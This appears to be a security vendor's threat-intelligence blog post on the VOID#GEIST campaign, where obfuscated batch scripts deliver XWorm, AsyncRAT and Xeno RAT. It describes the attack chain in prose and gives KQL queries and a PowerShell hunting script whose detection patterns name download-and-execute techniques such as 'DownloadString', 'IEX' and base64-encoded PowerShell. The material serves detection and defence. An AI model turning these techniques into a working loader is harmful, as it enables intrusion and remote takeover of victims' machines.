Unmasking VOID#GEIST: How Multi-Stage Batch Scripts Are Smuggling XWorm and AsyncRAT

In the ever-evolving landscape of cyber threats, simplicity often serves as the perfect camouflage. While sophisticated zero-days capture the headlines, threat actors frequently return to proven, rudimentary tools to bypass modern defenses. The latest example of this "old-school meets new-school" approach is VOID#GEIST, a multi-stage malware campaign recently disclosed by Securonix Threat Research.

This campaign is not flashy in its delivery, but it is devastatingly effective. By leveraging obfuscated batch scripts—tools that have been part of the Windows operating system for decades—attackers are orchestrating a complex delivery chain for some of the most dangerous Remote Access Trojans (RATs) currently in the wild, including XWorm, AsyncRAT, and Xeno RAT.

The VOID#GEIST Attack Chain Explained

The VOID#GEIST campaign begins, as many do, with a phishing lure or a malicious download designed to trick the user into executing a script. However, instead of a macro-laden document or a PowerShell one-liner, the initial payload is a batch script (.bat or .cmd).

At first glance, these scripts may appear benign or simply cluttered with garbage data. This is obfuscation, designed to confuse both human analysts and automated scanning engines.

Stage 1: The Batch File Dropper

The batch script serves as the "loader." Its primary function is to prepare the environment for the subsequent stages. This often involves:

• Disabling Security Controls: Modifying registry keys or utilizing built-in utilities to temporarily disable Windows Defender or other AV solutions.
• Establishing Persistence: Creating scheduled tasks or modifying startup folders to ensure the malware survives a reboot.
• Downloading the Payload: The script reaches out to a command-and-control (C2) server to retrieve the next stage.

Stage 2: The Encrypted RATs

What makes VOID#GEIST particularly potent is its use of encryption. The payloads delivered by the batch script are encrypted, making signature-based detection extremely difficult. Once downloaded, the script (or a subsequent PowerShell command it invokes) decrypts the payload in memory before executing it.

The "stars of the show" are the RATs:

• XWorm: A versatile malware capable of DDoS attacks, cryptocurrency mining, and data theft.
• AsyncRAT: Known for its robust remote control capabilities, allowing attackers to silently take over a victim's machine.
• Xeno RAT: A newer entrant focusing on evasion and persistence, often bypassing UAC (User Account Control).

Technical Analysis and TTPs

The Tactics, Techniques, and Procedures (TTPs) employed by VOID#GEIST highlight a shift toward "living-off-the-land" (LotL) tactics. By using cmd.exe and legitimate PowerShell commands to decrypt and load malware, the attackers blend in with normal administrative traffic.

A critical aspect of this campaign is the use of reflection loading or process hollowing to inject the RAT payload into a legitimate process (like explorer.exe or regsvr32.exe). This further masks the malicious activity, as the parent process might look legitimate.

Detection and Threat Hunting

Detecting VOID#GEIST requires looking beyond the initial file hash. Since the batch scripts are heavily obfuscated and the payloads are encrypted, we must hunt for behavioral anomalies.

KQL Queries (Microsoft Sentinel/Defender)

Use the following KQL query to hunt for suspicious child processes spawned by cmd.exe that exhibit behavior consistent with VOID#GEIST, specifically looking for interactions with PowerShell that involve Base64 encoding or web requests.

DeviceProcessEvents
| where InitiatingProcessFileName == "cmd.exe"
| where FileName in~ ("powershell.exe", "powershell_ise.exe", "mshta.exe")
| where ProcessCommandLine has_any ("DownloadString", "IEX", "Invoke-Expression", "FromBase64String")
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine, AccountName
| order by Timestamp desc


Additionally, monitor for the creation of batch files in suspicious directories:

DeviceFileEvents
| where FileName endswith ".bat"
| where FolderPath contains "Downloads" or FolderPath contains "AppData\\Local\\Temp"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
| order by Timestamp desc

PowerShell Hunting Script

Analysts can run the following PowerShell script on endpoints to identify recently created or modified batch files that contain high-risk obfuscation patterns.

$Paths = @("C:\Users\*\Downloads", "C:\Users\*\AppData\Local\Temp", "C:\ProgramData")
$RiskPatterns = @("powershell -e", "iex(", "DownloadString", "base64")

Get-ChildItem -Path $Paths -Filter *.bat -Recurse -ErrorAction SilentlyContinue | 
Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } | 
ForEach-Object {
    $Content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
    foreach ($Pattern in $RiskPatterns) {
        if ($Content -match $Pattern) {
            [PSCustomObject]@{
                File = $_.FullName
                LastWrite = $_.LastWriteTime
                MatchedPattern = $Pattern
                User = (Get-Acl $_.FullName).Owner
            }
        }
    }
}

Mitigation Strategies

To defend against the VOID#GEIST campaign and similar multi-stage threats, organizations must adopt a defense-in-depth approach:

1. Strict Application Control: Use AppLocker or Windows Defender Application Control (WDAC) to prevent unsigned batch files and scripts from running in user directories like Downloads or Temp.
2. Disable PowerShell for Non-Admins: Restrict PowerShell access to only administrative users who require it for their daily tasks.
3. Attack Surface Reduction (ASR) Rules: Enable ASR rules specifically:
   • "Block all Office applications from creating child processes"
   • "Block JavaScript or VBScript from launching downloaded executable content"
4. User Awareness: Train employees to recognize social engineering attempts. The initial infection vector is almost always a user tricked into running the "loader."

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub